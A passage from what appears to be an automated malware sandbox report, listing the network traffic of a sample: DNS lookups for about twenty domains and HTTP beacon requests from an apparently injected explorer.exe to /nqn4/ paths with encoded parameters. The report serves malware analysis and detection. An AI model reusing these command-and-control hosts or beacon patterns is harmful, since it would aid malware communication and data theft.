                                                                                          Oct 8, 2021 10:04:05.999614954 CEST4988980192.168.2.3150.95.255.38
                                                                                          Oct 8, 2021 10:04:05.999963999 CEST4989080192.168.2.3150.95.255.38
                                                                                          Oct 8, 2021 10:04:06.010164022 CEST8049888150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.010356903 CEST8049888150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.010370016 CEST8049888150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.010472059 CEST4988880192.168.2.3150.95.255.38
                                                                                          Oct 8, 2021 10:04:06.010498047 CEST4988880192.168.2.3150.95.255.38
                                                                                          Oct 8, 2021 10:04:06.283324957 CEST8049889150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.283350945 CEST8049889150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.283366919 CEST8049889150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.283390999 CEST8049889150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.283411980 CEST4988980192.168.2.3150.95.255.38
                                                                                          Oct 8, 2021 10:04:06.283529043 CEST4988980192.168.2.3150.95.255.38
                                                                                          Oct 8, 2021 10:04:06.289510965 CEST8049890150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.289592981 CEST4989080192.168.2.3150.95.255.38
                                                                                          Oct 8, 2021 10:04:06.289716005 CEST4989080192.168.2.3150.95.255.38
                                                                                          Oct 8, 2021 10:04:06.567152977 CEST8049889150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.567182064 CEST8049889150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.567193985 CEST8049889150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.567209959 CEST8049889150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.567265987 CEST8049889150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.567399979 CEST8049889150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.567539930 CEST8049889150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.567557096 CEST8049889150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.567625999 CEST4988980192.168.2.3150.95.255.38
                                                                                          Oct 8, 2021 10:04:06.567655087 CEST4988980192.168.2.3150.95.255.38
                                                                                          Oct 8, 2021 10:04:06.579144001 CEST8049890150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.579243898 CEST8049890150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.579286098 CEST8049890150.95.255.38192.168.2.3
                                                                                          Oct 8, 2021 10:04:06.579452038 CEST4989080192.168.2.3150.95.255.38
                                                                                          Oct 8, 2021 10:04:06.579493046 CEST4989080192.168.2.3150.95.255.38
                                                                                          Oct 8, 2021 10:04:06.868968010 CEST8049890150.95.255.38192.168.2.3

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Oct 8, 2021 10:00:58.819220066 CEST6345653192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:00:58.851130962 CEST53634568.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:01:03.932086945 CEST5854053192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:01:04.086030960 CEST53585408.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:01:09.447690010 CEST5894253192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:01:09.708383083 CEST53589428.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:01:15.410454035 CEST6443253192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:01:15.439382076 CEST53644328.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:01:20.584120035 CEST6349053192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:01:20.786155939 CEST53634908.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:01:26.428030014 CEST6511053192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:01:26.846267939 CEST53651108.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:01:32.415159941 CEST5307953192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:01:32.443639040 CEST53530798.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:01:38.074966908 CEST5082453192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:01:38.112288952 CEST53508248.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:01:43.199969053 CEST5356953192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:01:43.218480110 CEST53535698.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:01:53.555820942 CEST6285553192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:01:53.581012011 CEST53628558.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:01:58.590564966 CEST5104653192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:01:58.629287958 CEST53510468.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:02:03.734603882 CEST6550153192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:02:03.883374929 CEST53655018.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:02:08.910415888 CEST4929053192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:02:08.928669930 CEST53492908.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:02:13.959712029 CEST5975453192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:02:13.982512951 CEST53597548.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:02:19.002954960 CEST4923453192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:02:19.258126974 CEST53492348.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:02:37.873226881 CEST6358353192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:02:37.896269083 CEST53635838.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:02:42.977852106 CEST6409953192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:02:42.994801998 CEST53640998.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:02:48.146384001 CEST6461053192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:02:49.187817097 CEST6461053192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:02:49.324215889 CEST53646108.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:02:50.353704929 CEST53646108.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:02:54.350856066 CEST5198953192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:02:54.459427118 CEST53519898.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:03:00.139986992 CEST5315253192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:03:00.407546997 CEST53531528.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:03:06.009898901 CEST6159053192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:03:06.048002958 CEST53615908.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:03:11.169162035 CEST5607753192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:03:11.566500902 CEST53560778.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:03:17.306890965 CEST5795153192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:03:17.619559050 CEST53579518.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:03:28.031619072 CEST5327653192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:03:28.049868107 CEST53532768.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:03:39.823928118 CEST6013553192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:03:39.855479956 CEST53601358.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:03:39.863071918 CEST4984953192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:03:39.880100965 CEST53498498.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:03:39.883790970 CEST6025353192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:03:39.907480001 CEST53602538.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:03:50.090533018 CEST5870653192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:03:50.133275986 CEST53587068.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:03:50.136836052 CEST6267753192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:03:50.178991079 CEST53626778.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:03:50.182761908 CEST6259553192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:03:50.222532034 CEST53625958.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:03:55.232933998 CEST5118953192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:03:55.268409014 CEST53511898.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:03:55.271843910 CEST5145453192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:03:55.290107965 CEST53514548.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:03:55.293476105 CEST5716353192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:03:55.311244965 CEST53571638.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:04:00.326579094 CEST5636053192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:04:00.345040083 CEST53563608.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:04:00.352196932 CEST4925853192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:04:00.383986950 CEST53492588.8.8.8192.168.2.3
                                                                                          Oct 8, 2021 10:04:00.387476921 CEST5619553192.168.2.38.8.8.8
                                                                                          Oct 8, 2021 10:04:00.405992985 CEST53561958.8.8.8192.168.2.3

                                                                                          ICMP Packets

                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                          Oct 8, 2021 10:00:41.933471918 CEST192.168.2.38.8.8.8d0ef(Port unreachable)Destination Unreachable
                                                                                          Oct 8, 2021 10:02:50.353885889 CEST192.168.2.38.8.8.8d001(Port unreachable)Destination Unreachable

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                          Oct 8, 2021 10:00:58.819220066 CEST192.168.2.38.8.8.80x1aaStandard query (0)www.14attrayanteoffre.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:03.932086945 CEST192.168.2.38.8.8.80xb956Standard query (0)www.buyfood.storeA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:09.447690010 CEST192.168.2.38.8.8.80x21bbStandard query (0)www.trust-top.netA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:15.410454035 CEST192.168.2.38.8.8.80x663eStandard query (0)www.palisadestahoeresorts.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:20.584120035 CEST192.168.2.38.8.8.80x31aeStandard query (0)www.cmledbetter.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:26.428030014 CEST192.168.2.38.8.8.80xdc15Standard query (0)www.qgt114.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:32.415159941 CEST192.168.2.38.8.8.80xf743Standard query (0)www.serenityminded.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:38.074966908 CEST192.168.2.38.8.8.80x4949Standard query (0)www.alhudadevelopers.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:43.199969053 CEST192.168.2.38.8.8.80xdab7Standard query (0)www.cosmetictreat.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:53.555820942 CEST192.168.2.38.8.8.80x2477Standard query (0)www.lkdwaterfowlers.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:58.590564966 CEST192.168.2.38.8.8.80xabcfStandard query (0)www.geefmijcorona.onlineA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:03.734603882 CEST192.168.2.38.8.8.80xe5c6Standard query (0)www.minecrafttop.netA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:08.910415888 CEST192.168.2.38.8.8.80x9f94Standard query (0)www.totusnet.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:13.959712029 CEST192.168.2.38.8.8.80x2fc3Standard query (0)www.stlaurenthp.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:19.002954960 CEST192.168.2.38.8.8.80xd7c6Standard query (0)www.eco1tnpasumo3.xyzA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:37.873226881 CEST192.168.2.38.8.8.80x20beStandard query (0)www.ayushigangwar.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:42.977852106 CEST192.168.2.38.8.8.80x54cdStandard query (0)www.lawsonboards.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:48.146384001 CEST192.168.2.38.8.8.80x320cStandard query (0)www.earthsidesoulalchemist.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:49.187817097 CEST192.168.2.38.8.8.80x320cStandard query (0)www.earthsidesoulalchemist.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:54.350856066 CEST192.168.2.38.8.8.80x60c4Standard query (0)www.alsafi.websiteA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:00.139986992 CEST192.168.2.38.8.8.80x7c50Standard query (0)www.eco1tnpasumo3.xyzA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:06.009898901 CEST192.168.2.38.8.8.80xef7eStandard query (0)www.alhudadevelopers.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:11.169162035 CEST192.168.2.38.8.8.80x4cf7Standard query (0)www.qgt114.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:17.306890965 CEST192.168.2.38.8.8.80xbdffStandard query (0)www.8straps.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:28.031619072 CEST192.168.2.38.8.8.80x6a49Standard query (0)www.brasbux.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:39.823928118 CEST192.168.2.38.8.8.80xac3aStandard query (0)www.lkdwaterfowlers.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:39.863071918 CEST192.168.2.38.8.8.80x2bb4Standard query (0)www.lkdwaterfowlers.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:39.883790970 CEST192.168.2.38.8.8.80x3b8dStandard query (0)www.lkdwaterfowlers.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:50.090533018 CEST192.168.2.38.8.8.80x95efStandard query (0)www.minecrafttop.netA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:50.136836052 CEST192.168.2.38.8.8.80xe8ccStandard query (0)www.minecrafttop.netA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:50.182761908 CEST192.168.2.38.8.8.80x6ad6Standard query (0)www.minecrafttop.netA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:55.232933998 CEST192.168.2.38.8.8.80x5344Standard query (0)www.totusnet.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:55.271843910 CEST192.168.2.38.8.8.80x787eStandard query (0)www.totusnet.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:55.293476105 CEST192.168.2.38.8.8.80xcde3Standard query (0)www.totusnet.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:04:00.326579094 CEST192.168.2.38.8.8.80xd27aStandard query (0)www.stlaurenthp.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:04:00.352196932 CEST192.168.2.38.8.8.80x25f0Standard query (0)www.stlaurenthp.comA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:04:00.387476921 CEST192.168.2.38.8.8.80x4d78Standard query (0)www.stlaurenthp.comA (IP address)IN (0x0001)

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                          Oct 8, 2021 10:00:58.851130962 CEST8.8.8.8192.168.2.30x1aaNo error (0)www.14attrayanteoffre.com14attrayanteoffre.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 8, 2021 10:00:58.851130962 CEST8.8.8.8192.168.2.30x1aaNo error (0)14attrayanteoffre.com37.187.131.150A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:04.086030960 CEST8.8.8.8192.168.2.30xb956No error (0)www.buyfood.store208.91.197.91A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:09.708383083 CEST8.8.8.8192.168.2.30x21bbNo error (0)www.trust-top.net183.181.96.79A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:15.439382076 CEST8.8.8.8192.168.2.30x663eNo error (0)www.palisadestahoeresorts.compalisadestahoeresorts.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:15.439382076 CEST8.8.8.8192.168.2.30x663eNo error (0)palisadestahoeresorts.com34.102.136.180A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:20.786155939 CEST8.8.8.8192.168.2.30x31aeNo error (0)www.cmledbetter.comcmledbetter.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:20.786155939 CEST8.8.8.8192.168.2.30x31aeNo error (0)cmledbetter.com198.37.103.70A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:26.846267939 CEST8.8.8.8192.168.2.30xdc15No error (0)www.qgt114.com155.159.216.37A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:32.443639040 CEST8.8.8.8192.168.2.30xf743No error (0)www.serenityminded.comserenityminded.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:32.443639040 CEST8.8.8.8192.168.2.30xf743No error (0)serenityminded.com167.172.158.202A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:38.112288952 CEST8.8.8.8192.168.2.30x4949No error (0)www.alhudadevelopers.com5.77.41.136A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:43.218480110 CEST8.8.8.8192.168.2.30xdab7No error (0)www.cosmetictreat.comHDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:43.218480110 CEST8.8.8.8192.168.2.30xdab7No error (0)HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com3.223.115.185A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:53.581012011 CEST8.8.8.8192.168.2.30x2477Name error (3)www.lkdwaterfowlers.comnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:01:58.629287958 CEST8.8.8.8192.168.2.30xabcfNo error (0)www.geefmijcorona.online145.131.10.226A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:03.883374929 CEST8.8.8.8192.168.2.30xe5c6Name error (3)www.minecrafttop.netnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:08.928669930 CEST8.8.8.8192.168.2.30x9f94Name error (3)www.totusnet.comnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:13.982512951 CEST8.8.8.8192.168.2.30x2fc3Name error (3)www.stlaurenthp.comnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:19.258126974 CEST8.8.8.8192.168.2.30xd7c6No error (0)www.eco1tnpasumo3.xyz150.95.255.38A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:37.896269083 CEST8.8.8.8192.168.2.30x20beNo error (0)www.ayushigangwar.com104.21.66.86A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:37.896269083 CEST8.8.8.8192.168.2.30x20beNo error (0)www.ayushigangwar.com172.67.157.254A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:42.994801998 CEST8.8.8.8192.168.2.30x54cdNo error (0)www.lawsonboards.comlawsonboards.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:42.994801998 CEST8.8.8.8192.168.2.30x54cdNo error (0)lawsonboards.com34.102.136.180A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:49.324215889 CEST8.8.8.8192.168.2.30x320cServer failure (2)www.earthsidesoulalchemist.comnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:50.353704929 CEST8.8.8.8192.168.2.30x320cServer failure (2)www.earthsidesoulalchemist.comnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:02:54.459427118 CEST8.8.8.8192.168.2.30x60c4No error (0)www.alsafi.website66.96.147.118A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:00.407546997 CEST8.8.8.8192.168.2.30x7c50No error (0)www.eco1tnpasumo3.xyz150.95.255.38A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:06.048002958 CEST8.8.8.8192.168.2.30xef7eNo error (0)www.alhudadevelopers.com5.77.41.136A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:11.566500902 CEST8.8.8.8192.168.2.30x4cf7No error (0)www.qgt114.com155.159.216.37A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:17.619559050 CEST8.8.8.8192.168.2.30xbdffNo error (0)www.8straps.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:17.619559050 CEST8.8.8.8192.168.2.30xbdffNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:28.049868107 CEST8.8.8.8192.168.2.30x6a49No error (0)www.brasbux.com199.192.27.31A (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:39.855479956 CEST8.8.8.8192.168.2.30xac3aName error (3)www.lkdwaterfowlers.comnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:39.880100965 CEST8.8.8.8192.168.2.30x2bb4Name error (3)www.lkdwaterfowlers.comnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:39.907480001 CEST8.8.8.8192.168.2.30x3b8dName error (3)www.lkdwaterfowlers.comnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:50.133275986 CEST8.8.8.8192.168.2.30x95efName error (3)www.minecrafttop.netnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:50.178991079 CEST8.8.8.8192.168.2.30xe8ccName error (3)www.minecrafttop.netnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:50.222532034 CEST8.8.8.8192.168.2.30x6ad6Name error (3)www.minecrafttop.netnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:55.268409014 CEST8.8.8.8192.168.2.30x5344Name error (3)www.totusnet.comnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:55.290107965 CEST8.8.8.8192.168.2.30x787eName error (3)www.totusnet.comnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:03:55.311244965 CEST8.8.8.8192.168.2.30xcde3Name error (3)www.totusnet.comnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:04:00.345040083 CEST8.8.8.8192.168.2.30xd27aName error (3)www.stlaurenthp.comnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:04:00.383986950 CEST8.8.8.8192.168.2.30x25f0Name error (3)www.stlaurenthp.comnonenoneA (IP address)IN (0x0001)
                                                                                          Oct 8, 2021 10:04:00.405992985 CEST8.8.8.8192.168.2.30x4d78Name error (3)www.stlaurenthp.comnonenoneA (IP address)IN (0x0001)

                                                                                          HTTP Request Dependency Graph

                                                                                          • www.14attrayanteoffre.com
                                                                                          • www.buyfood.store
                                                                                          • www.trust-top.net
                                                                                          • www.palisadestahoeresorts.com
                                                                                          • www.cmledbetter.com
                                                                                          • www.qgt114.com
                                                                                          • www.serenityminded.com
                                                                                          • www.alhudadevelopers.com
                                                                                          • www.cosmetictreat.com
                                                                                          • www.geefmijcorona.online
                                                                                          • www.eco1tnpasumo3.xyz
                                                                                          • www.ayushigangwar.com
                                                                                          • www.lawsonboards.com
                                                                                          • www.alsafi.website
                                                                                          • www.8straps.com
                                                                                          • www.brasbux.com

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          0192.168.2.34980937.187.131.15080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:00:58.886338949 CEST4863OUTGET /nqn4/?T2MpwT=i5AiHmtUG4jSq3EeZPtwH7k+iHy5Ue3XoSuQEDxJDegsoJeUadNIxOzHTmstHRTgws5R&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.14attrayanteoffre.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:00:58.914980888 CEST4864INHTTP/1.1 301 Moved Permanently
                                                                                          Date: Fri, 08 Oct 2021 08:00:58 GMT
                                                                                          Server: Apache
                                                                                          Location: https://www.14attrayanteoffre.com/nqn4/?T2MpwT=i5AiHmtUG4jSq3EeZPtwH7k+iHy5Ue3XoSuQEDxJDegsoJeUadNIxOzHTmstHRTgws5R&VDK0L=5jZhjDchE
                                                                                          Content-Length: 343
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 34 61 74 74 72 61 79 61 6e 74 65 6f 66 66 72 65 2e 63 6f 6d 2f 6e 71 6e 34 2f 3f 54 32 4d 70 77 54 3d 69 35 41 69 48 6d 74 55 47 34 6a 53 71 33 45 65 5a 50 74 77 48 37 6b 2b 69 48 79 35 55 65 33 58 6f 53 75 51 45 44 78 4a 44 65 67 73 6f 4a 65 55 61 64 4e 49 78 4f 7a 48 54 6d 73 74 48 52 54 67 77 73 35 52 26 61 6d 70 3b 56 44 4b 30 4c 3d 35 6a 5a 68 6a 44 63 68 45 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.14attrayanteoffre.com/nqn4/?T2MpwT=i5AiHmtUG4jSq3EeZPtwH7k+iHy5Ue3XoSuQEDxJDegsoJeUadNIxOzHTmstHRTgws5R&amp;VDK0L=5jZhjDchE">here</a>.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          1192.168.2.349829208.91.197.9180C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:01:04.231592894 CEST5716OUTGET /nqn4/?T2MpwT=NpvTDsLqAO0mKT6/pRGYfFBszb31UzDXQRSyhvlh8npGorp/J75qkvnZqxnVuczwTiaF&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.buyfood.store
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:01:04.426774979 CEST5720INHTTP/1.1 200 OK
                                                                                          Date: Fri, 08 Oct 2021 08:01:04 GMT
                                                                                          Server: Apache
                                                                                          Set-Cookie: vsid=919vr3812256643540964; expires=Wed, 07-Oct-2026 08:01:04 GMT; Max-Age=157680000; path=/; domain=www.buyfood.store; HttpOnly
                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_VjMAakhYm1CXI0PIuHfMp77Hu3tql6ZeWkbiWIU62UwBm7PKjL3PWE+d9kzw+sdume/zwrgmoafC+QXvd2gsqA==
                                                                                          Content-Length: 2557
                                                                                          Keep-Alive: timeout=5, max=120
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: text/html; charset=UTF-8
